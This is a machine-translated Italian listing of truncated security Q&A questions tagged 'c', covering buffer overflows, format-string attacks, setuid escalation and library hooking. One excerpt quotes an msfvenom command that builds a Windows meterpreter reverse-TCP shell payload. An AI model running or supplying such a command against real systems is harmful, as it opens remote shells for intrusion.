Domande con tag 'c'

domande con tag
2
risposte

Se C usa librerie condivise, è possibile scrivere un programma che modificherà il codice che apre un file

Se C utilizza librerie condivise, è possibile scrivere un programma che modificherà la funzione fopen per eseguire un codice dannoso? In che modo il sistema operativo può proteggere l'utente da questo?     
posta 30.10.2018 - 02:20
2
risposte

Buffer Overflow problem [chiuso]

Ho una breve domanda su un exploit buffer-overflow in un binario a 64 bit. Ultimamente, ho trovato alcune vulnerabilità di base del buffer overflow. Speravo di sapere come gestirlo, ma a quanto pare, non lo so. Codice attività: void vulnFun...
posta 30.05.2018 - 18:07
1
risposta

Protezione delle autorizzazioni di accesso ai file .so

Lavoro per un luogo che offre una suite di crittografia per le app Android sotto forma di una libreria di .so C da integrare nelle app Android. Il problema è che nella libreria .so sono presenti solo due funzioni esportate: una funz...
posta 11.04.2018 - 16:00
1
risposta

Overflow buffer: perché il registro ESP cambia il suo valore dopo la violazione di accesso

Sfondo: Attualmente tenta di sfruttare una vulnerabilità BoF. Dopo aver configurato l'ambiente, eseguendo un programma C compilato che contiene la funzione strcpy, ho disassemblato il programma mentre è in esecuzione in Immunity Debugger, quin...
posta 28.03.2018 - 08:23
1
risposta

È possibile scrivere un valore superiore a 64 bit utilizzando un attacco di stringa formato (% n)?

Attualmente sto esplorando gli attacchi con stringhe di formato. Tuttavia, il buffer in questo esempio non si trova nello stack ma nell'heap, quindi l'approccio più comune non funziona e le mie opzioni di indirizzi che posso sovrascrivere sembra...
posta 26.01.2018 - 23:17
2
risposte

Ottenere root con setuid e il flag s

Ok, quindi sto cercando di capire cosa fa il flag s in linux. Ho il seguente codice: #include <stdlib.h> #include <unistd.h> #include <string.h> #include <sys/types.h> #include <stdio.h> int main(int argc, cha...
posta 25.08.2017 - 02:51
1
risposta

Errore di segmentazione nello shellcode

Ho generato un codice shell con msfvenom # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=7878 -f c -o shell.c Quando compilo il mio shell.c con gcc (versione 6.3.0-16) con questa opzione: # gcc -o shell shell.c # gc...
posta 12.05.2017 - 01:28
1
risposta

Specificatore di formato MSFvenom

In msfvenom, cosa significa esattamente quando specificherò il formato in C o Python? E qual è il formato 'raw' per? Lo so, quando il formato è psh-cmd viene eseguito nel prompt dei comandi, e quando è exe viene eseguito come un normale eseguibi...
posta 24.09.2016 - 21:35
1
risposta

È possibile o è stato possibile registrare un certificato con caratteri jolly nel sottodominio di terzo livello?

L'uso di un byte null in un certificato cn è molto conosciuto ... e ho visto questo codice in un famoso server smtp (che ovviamente pensava che non valesse la pena usare gnutls o openssl per fare quel genere di cose) : static bool does_n...
posta 03.05.2016 - 16:35
2
risposte

Statico vs collegamento dinamico

Mi sono imbattuto nel sito di implementazione di DJB Curve25519 ( link ) e ho notato che afferma in riferimento al suo utilizzo: You can and should include it in your own programs, rather than going to the effort of linking to a shared libr...
posta 23.02.2016 - 22:10